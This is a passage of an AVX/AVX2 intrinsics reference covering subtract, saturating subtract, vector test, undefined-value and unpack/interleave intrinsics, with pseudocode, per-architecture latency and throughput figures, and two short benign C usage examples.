
Synopsis

__m256i _mm256_sub_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed 8-bit integers in b from packed 8-bit integers in a, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := a[i+7:i] - b[i+7:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vsubpd
__m256d _mm256_sub_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_sub_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vsubpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Subtract packed double-precision (64-bit) floating-point elements in b from packed double-precision (64-bit) floating-point elements in a, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+63:i] - b[i+63:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vsubps
__m256 _mm256_sub_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_sub_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vsubps ymm, ymm, ymm
CPUID Flags: AVX

Description

Subtract packed single-precision (32-bit) floating-point elements in b from packed single-precision (32-bit) floating-point elements in a, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[i+31:i] - b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vpsubsw
__m256i _mm256_subs_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_subs_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed 16-bit integers in b from packed 16-bit integers in a using saturation, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := Saturate_To_Int16(a[i+15:i] - b[i+15:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsubsb
__m256i _mm256_subs_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_subs_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubsb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed 8-bit integers in b from packed 8-bit integers in a using saturation, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := Saturate_To_Int8(a[i+7:i] - b[i+7:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsubusw
__m256i _mm256_subs_epu16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_subs_epu16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubusw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed unsigned 16-bit integers in b from packed unsigned 16-bit integers in a using saturation, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := Saturate_To_UnsignedInt16(a[i+15:i] - b[i+15:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsubusb
__m256i _mm256_subs_epu8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_subs_epu8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubusb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed unsigned 8-bit integers in b from packed unsigned 8-bit integers in a using saturation, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := Saturate_To_UnsignedInt8(a[i+7:i] - b[i+7:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
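
The saturating forms clamp instead of wrapping, which is typically what you want for pixel-style arithmetic. A small comparison sketch (assumes -mavx2):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    __m256i a = _mm256_set1_epi8(10);
    __m256i b = _mm256_set1_epi8(20);

    __m256i wrap = _mm256_sub_epi8(a, b);    /* 10 - 20 wraps to -10             */
    __m256i sat  = _mm256_subs_epu8(a, b);   /* unsigned saturation: clamps to 0 */

    unsigned char out[32];
    _mm256_storeu_si256((__m256i *)out, wrap);
    printf("wrapping:   %d\n", (signed char)out[0]);   /* -10 */
    _mm256_storeu_si256((__m256i *)out, sat);
    printf("saturating: %d\n", out[0]);                /*   0 */
    return 0;
}
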
vtestpd
int _mm_testc_pd (__m128d a, __m128d b)

Synopsis

int _mm_testc_pd (__m128d a, __m128d b)
#include «immintrin.h»
Instruction: vtestpd xmm, xmm
CPUID Flags: AVX

Description

Compute the bitwise AND of 128 bits (representing double-precision (64-bit) floating-point elements) in a and b, producing an intermediate 128-bit value, and set ZF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set CF to 0. Return the CF value.

Operation

tmp[127:0] := a[127:0] AND b[127:0] IF (tmp[63] == tmp[127] == 0) ZF := 1 ELSE ZF := 0 FI tmp[127:0] := (NOT a[127:0]) AND b[127:0] IF (tmp[63] == tmp[127] == 0) CF := 1 ELSE CF := 0 FI RETURN CF

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vtestpd
int _mm256_testc_pd (__m256d a, __m256d b)

Synopsis

int _mm256_testc_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vtestpd ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing double-precision (64-bit) floating-point elements) in a and b, producing an intermediate 256-bit value, and set ZF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set CF to 0. Return the CF value.

Operation

tmp[255:0] := a[255:0] AND b[255:0] IF (tmp[63] == tmp[127] == tmp[191] == tmp[255] == 0) ZF := 1 ELSE ZF := 0 FI tmp[255:0] := (NOT a[255:0]) AND b[255:0] IF (tmp[63] == tmp[127] == tmp[191] == tmp[255] == 0) CF := 1 ELSE CF := 0 FI RETURN CF

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vtestps
int _mm_testc_ps (__m128 a, __m128 b)

Synopsis

int _mm_testc_ps (__m128 a, __m128 b)
#include «immintrin.h»
Instruction: vtestps xmm, xmm
CPUID Flags: AVX

Description

Compute the bitwise AND of 128 bits (representing single-precision (32-bit) floating-point elements) in a and b, producing an intermediate 128-bit value, and set ZF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set CF to 0. Return the CF value.

Operation

tmp[127:0] := a[127:0] AND b[127:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == 0) ZF := 1 ELSE ZF := 0 FI tmp[127:0] := (NOT a[127:0]) AND b[127:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == 0) CF := 1 ELSE CF := 0 FI RETURN CF

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vtestps
int _mm256_testc_ps (__m256 a, __m256 b)

Synopsis

int _mm256_testc_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vtestps ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing single-precision (32-bit) floating-point elements) in a and b, producing an intermediate 256-bit value, and set ZF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set CF to 0. Return the CF value.

Operation

tmp[255:0] := a[255:0] AND b[255:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == tmp[159] == tmp[191] == tmp[223] == tmp[255] == 0) ZF := 1 ELSE ZF := 0 FI tmp[255:0] := (NOT a[255:0]) AND b[255:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == tmp[159] == tmp[191] == tmp[223] == tmp[255] == 0) CF := 1 ELSE CF := 0 FI RETURN CF

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vptest
int _mm256_testc_si256 (__m256i a, __m256i b)

Synopsis

int _mm256_testc_si256 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vptest ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing integer data) in a and b, and set ZF to 1 if the result is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, and set CF to 1 if the result is zero, otherwise set CF to 0. Return the CF value.

Operation

IF (a[255:0] AND b[255:0] == 0) ZF := 1 ELSE ZF := 0 FI IF ((NOT a[255:0]) AND b[255:0] == 0) CF := 1 ELSE CF := 0 FI RETURN CF

Performance

Architecture Latency Throughput
Haswell 4
Ivy Bridge 2
Sandy Bridge 2
vtestpd
int _mm_testnzc_pd (__m128d a, __m128d b)

Synopsis

int _mm_testnzc_pd (__m128d a, __m128d b)
#include «immintrin.h»
Instruction: vtestpd xmm, xmm
CPUID Flags: AVX

Description

Compute the bitwise AND of 128 bits (representing double-precision (64-bit) floating-point elements) in a and b, producing an intermediate 128-bit value, and set ZF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set CF to 0. Return 1 if both the ZF and CF values are zero, otherwise return 0.

Operation

tmp[127:0] := a[127:0] AND b[127:0] IF (tmp[63] == tmp[127] == 0) ZF := 1 ELSE ZF := 0 FI tmp[127:0] := (NOT a[127:0]) AND b[127:0] IF (tmp[63] == tmp[127] == 0) CF := 1 ELSE CF := 0 FI IF (ZF == 0 && CF == 0) RETURN 1 ELSE RETURN 0 FI

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vtestpd
int _mm256_testnzc_pd (__m256d a, __m256d b)

Synopsis

int _mm256_testnzc_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vtestpd ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing double-precision (64-bit) floating-point elements) in a and b, producing an intermediate 256-bit value, and set ZF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set CF to 0. Return 1 if both the ZF and CF values are zero, otherwise return 0.

Operation

tmp[255:0] := a[255:0] AND b[255:0] IF (tmp[63] == tmp[127] == tmp[191] == tmp[255] == 0) ZF := 1 ELSE ZF := 0 FI tmp[255:0] := (NOT a[255:0]) AND b[255:0] IF (tmp[63] == tmp[127] == tmp[191] == tmp[255] == 0) CF := 1 ELSE CF := 0 FI IF (ZF == 0 && CF == 0) RETURN 1 ELSE RETURN 0 FI

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vtestps
int _mm_testnzc_ps (__m128 a, __m128 b)

Synopsis

int _mm_testnzc_ps (__m128 a, __m128 b)
#include «immintrin.h»
Instruction: vtestps xmm, xmm
CPUID Flags: AVX

Description

Compute the bitwise AND of 128 bits (representing single-precision (32-bit) floating-point elements) in a and b, producing an intermediate 128-bit value, and set ZF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set CF to 0. Return 1 if both the ZF and CF values are zero, otherwise return 0.

Operation

tmp[127:0] := a[127:0] AND b[127:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == 0) ZF := 1 ELSE ZF := 0 FI tmp[127:0] := (NOT a[127:0]) AND b[127:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == 0) CF := 1 ELSE CF := 0 FI IF (ZF == 0 && CF == 0) RETURN 1 ELSE RETURN 0 FI

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vtestps
int _mm256_testnzc_ps (__m256 a, __m256 b)

Synopsis

int _mm256_testnzc_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vtestps ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing single-precision (32-bit) floating-point elements) in a and b, producing an intermediate 256-bit value, and set ZF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set CF to 0. Return 1 if both the ZF and CF values are zero, otherwise return 0.

Operation

tmp[255:0] := a[255:0] AND b[255:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == tmp[159] == tmp[191] == tmp[223] == tmp[255] == 0) ZF := 1 ELSE ZF := 0 FI tmp[255:0] := (NOT a[255:0]) AND b[255:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == tmp[159] == tmp[191] == tmp[223] == tmp[255] == 0) CF := 1 ELSE CF := 0 FI IF (ZF == 0 && CF == 0) RETURN 1 ELSE RETURN 0 FI

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vptest
int _mm256_testnzc_si256 (__m256i a, __m256i b)

Synopsis

int _mm256_testnzc_si256 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vptest ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing integer data) in a and b, and set ZF to 1 if the result is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, and set CF to 1 if the result is zero, otherwise set CF to 0. Return 1 if both the ZF and CF values are zero, otherwise return 0.

Operation

IF (a[255:0] AND b[255:0] == 0) ZF := 1 ELSE ZF := 0 FI IF ((NOT a[255:0]) AND b[255:0] == 0) CF := 1 ELSE CF := 0 FI IF (ZF == 0 && CF == 0) RETURN 1 ELSE RETURN 0 FI

Performance

Architecture Latency Throughput
Haswell 4
Ivy Bridge 2
Sandy Bridge 2
vtestpd
int _mm_testz_pd (__m128d a, __m128d b)

Synopsis

int _mm_testz_pd (__m128d a, __m128d b)
#include «immintrin.h»
Instruction: vtestpd xmm, xmm
CPUID Flags: AVX

Description

Compute the bitwise AND of 128 bits (representing double-precision (64-bit) floating-point elements) in a and b, producing an intermediate 128-bit value, and set ZF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set CF to 0. Return the ZF value.

Operation

tmp[127:0] := a[127:0] AND b[127:0] IF (tmp[63] == tmp[127] == 0) ZF := 1 ELSE ZF := 0 FI tmp[127:0] := (NOT a[127:0]) AND b[127:0] IF (tmp[63] == tmp[127] == 0) CF := 1 ELSE CF := 0 FI RETURN ZF

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vtestpd
int _mm256_testz_pd (__m256d a, __m256d b)

Synopsis

int _mm256_testz_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vtestpd ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing double-precision (64-bit) floating-point elements) in a and b, producing an intermediate 256-bit value, and set ZF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 64-bit element in the intermediate value is zero, otherwise set CF to 0. Return the ZF value.

Operation

tmp[255:0] := a[255:0] AND b[255:0] IF (tmp[63] == tmp[127] == tmp[191] == tmp[255] == 0) ZF := 1 ELSE ZF := 0 FI tmp[255:0] := (NOT a[255:0]) AND b[255:0] IF (tmp[63] == tmp[127] == tmp[191] == tmp[255] == 0) CF := 1 ELSE CF := 0 FI RETURN ZF

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vtestps
int _mm_testz_ps (__m128 a, __m128 b)

Synopsis

int _mm_testz_ps (__m128 a, __m128 b)
#include «immintrin.h»
Instruction: vtestps xmm, xmm
CPUID Flags: AVX

Description

Compute the bitwise AND of 128 bits (representing single-precision (32-bit) floating-point elements) in a and b, producing an intermediate 128-bit value, and set ZF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set CF to 0. Return the ZF value.

Operation

tmp[127:0] := a[127:0] AND b[127:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == 0) ZF := 1 ELSE ZF := 0 FI tmp[127:0] := (NOT a[127:0]) AND b[127:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == 0) CF := 1 ELSE CF := 0 FI RETURN ZF

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vtestps
int _mm256_testz_ps (__m256 a, __m256 b)

Synopsis

int _mm256_testz_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vtestps ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing single-precision (32-bit) floating-point elements) in a and b, producing an intermediate 256-bit value, and set ZF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, producing an intermediate value, and set CF to 1 if the sign bit of each 32-bit element in the intermediate value is zero, otherwise set CF to 0. Return the ZF value.

Operation

tmp[255:0] := a[255:0] AND b[255:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == tmp[159] == tmp[191] == tmp[223] == tmp[255] == 0) ZF := 1 ELSE ZF := 0 FI tmp[255:0] := (NOT a[255:0]) AND b[255:0] IF (tmp[31] == tmp[63] == tmp[95] == tmp[127] == tmp[159] == tmp[191] == tmp[223] == tmp[255] == 0) CF := 1 ELSE CF := 0 FI RETURN ZF

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vptest
int _mm256_testz_si256 (__m256i a, __m256i b)

Synopsis

int _mm256_testz_si256 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vptest ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of 256 bits (representing integer data) in a and b, and set ZF to 1 if the result is zero, otherwise set ZF to 0. Compute the bitwise NOT of a and then AND with b, and set CF to 1 if the result is zero, otherwise set CF to 0. Return the ZF value.

Operation

IF (a[255:0] AND b[255:0] == 0) ZF := 1 ELSE ZF := 0 FI IF ((NOT a[255:0]) AND b[255:0] == 0) CF := 1 ELSE CF := 0 FI RETURN ZF

Performance

Architecture Latency Throughput
Haswell 4
Ivy Bridge 2
Sandy Bridge 2
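
The test intrinsics are branchless flag tests: testz is the usual "is this vector all zero?" / "do these masks intersect?" idiom, and testc checks whether a covers every set bit of b. A minimal sketch (assumes -mavx):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    __m256i zero = _mm256_setzero_si256();
    __m256i ones = _mm256_set1_epi32(-1);
    __m256i mask = _mm256_set_epi32(0, 0, 0, 0, 0, 0, 0, 1);

    printf("zero is all zero: %d\n", _mm256_testz_si256(zero, zero));  /* 1 */
    printf("mask is all zero: %d\n", _mm256_testz_si256(mask, mask));  /* 0 */
    printf("ones covers mask: %d\n", _mm256_testc_si256(ones, mask));  /* 1 */
    return 0;
}
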
__m256d _mm256_undefined_pd (void)

Synopsis

__m256d _mm256_undefined_pd (void)
#include «immintrin.h»
CPUID Flags: AVX

Description

Return vector of type __m256d with undefined elements.
__m256 _mm256_undefined_ps (void)

Synopsis

__m256 _mm256_undefined_ps (void)
#include «immintrin.h»
CPUID Flags: AVX

Description

Return vector of type __m256 with undefined elements.
__m256i _mm256_undefined_si256 (void)

Synopsis

__m256i _mm256_undefined_si256 (void)
#include «immintrin.h»
CPUID Flags: AVX

Description

Return vector of type __m256i with undefined elements.
vpunpckhwd
__m256i _mm256_unpackhi_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpackhi_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpckhwd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 16-bit integers from the high half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_HIGH_WORDS(src1[127:0], src2[127:0]){ dst[15:0] := src1[79:64] dst[31:16] := src2[79:64] dst[47:32] := src1[95:80] dst[63:48] := src2[95:80] dst[79:64] := src1[111:96] dst[95:80] := src2[111:96] dst[111:96] := src1[127:112] dst[127:112] := src2[127:112] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_HIGH_WORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_HIGH_WORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpunpckhdq
__m256i _mm256_unpackhi_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpackhi_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpckhdq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 32-bit integers from the high half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_HIGH_DWORDS(src1[127:0], src2[127:0]){ dst[31:0] := src1[95:64] dst[63:32] := src2[95:64] dst[95:64] := src1[127:96] dst[127:96] := src2[127:96] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_HIGH_DWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_HIGH_DWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpunpckhqdq
__m256i _mm256_unpackhi_epi64 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpackhi_epi64 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpckhqdq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 64-bit integers from the high half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_HIGH_QWORDS(src1[127:0], src2[127:0]){ dst[63:0] := src1[127:64] dst[127:64] := src2[127:64] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_HIGH_QWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_HIGH_QWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpunpckhbw
__m256i _mm256_unpackhi_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpackhi_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpckhbw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 8-bit integers from the high half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_HIGH_BYTES(src1[127:0], src2[127:0]){ dst[7:0] := src1[71:64] dst[15:8] := src2[71:64] dst[23:16] := src1[79:72] dst[31:24] := src2[79:72] dst[39:32] := src1[87:80] dst[47:40] := src2[87:80] dst[55:48] := src1[95:88] dst[63:56] := src2[95:88] dst[71:64] := src1[103:96] dst[79:72] := src2[103:96] dst[87:80] := src1[111:104] dst[95:88] := src2[111:104] dst[103:96] := src1[119:112] dst[111:104] := src2[119:112] dst[119:112] := src1[127:120] dst[127:120] := src2[127:120] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_HIGH_BYTES(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_HIGH_BYTES(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vunpckhpd
__m256d _mm256_unpackhi_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_unpackhi_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vunpckhpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Unpack and interleave double-precision (64-bit) floating-point elements from the high half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_HIGH_QWORDS(src1[127:0], src2[127:0]){ dst[63:0] := src1[127:64] dst[127:64] := src2[127:64] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_HIGH_QWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_HIGH_QWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vunpckhps
__m256 _mm256_unpackhi_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_unpackhi_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vunpckhps ymm, ymm, ymm
CPUID Flags: AVX

Description

Unpack and interleave single-precision (32-bit) floating-point elements from the high half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_HIGH_DWORDS(src1[127:0], src2[127:0]){ dst[31:0] := src1[95:64] dst[63:32] := src2[95:64] dst[95:64] := src1[127:96] dst[127:96] := src2[127:96] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_HIGH_DWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_HIGH_DWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpunpcklwd
__m256i _mm256_unpacklo_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpacklo_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpcklwd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 16-bit integers from the low half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_WORDS(src1[127:0], src2[127:0]){ dst[15:0] := src1[15:0] dst[31:16] := src2[15:0] dst[47:32] := src1[31:16] dst[63:48] := src2[31:16] dst[79:64] := src1[47:32] dst[95:80] := src2[47:32] dst[111:96] := src1[63:48] dst[127:112] := src2[63:48] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_WORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_WORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpunpckldq
__m256i _mm256_unpacklo_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpacklo_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpckldq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 32-bit integers from the low half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_DWORDS(src1[127:0], src2[127:0]){ dst[31:0] := src1[31:0] dst[63:32] := src2[31:0] dst[95:64] := src1[63:32] dst[127:96] := src2[63:32] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_DWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_DWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpunpcklqdq
__m256i _mm256_unpacklo_epi64 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpacklo_epi64 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpcklqdq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 64-bit integers from the low half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_QWORDS(src1[127:0], src2[127:0]){ dst[63:0] := src1[63:0] dst[127:64] := src2[63:0] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_QWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_QWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpunpcklbw
__m256i _mm256_unpacklo_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_unpacklo_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpunpcklbw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Unpack and interleave 8-bit integers from the low half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_BYTES(src1[127:0], src2[127:0]){ dst[7:0] := src1[7:0] dst[15:8] := src2[7:0] dst[23:16] := src1[15:8] dst[31:24] := src2[15:8] dst[39:32] := src1[23:16] dst[47:40] := src2[23:16] dst[55:48] := src1[31:24] dst[63:56] := src2[31:24] dst[71:64] := src1[39:32] dst[79:72] := src2[39:32] dst[87:80] := src1[47:40] dst[95:88] := src2[47:40] dst[103:96] := src1[55:48] dst[111:104] := src2[55:48] dst[119:112] := src1[63:56] dst[127:120] := src2[63:56] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_BYTES(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_BYTES(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vunpcklpd
__m256d _mm256_unpacklo_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_unpacklo_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vunpcklpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Unpack and interleave double-precision (64-bit) floating-point elements from the low half of each 128-bit lane in a and b, and store the results in dst.

Operation

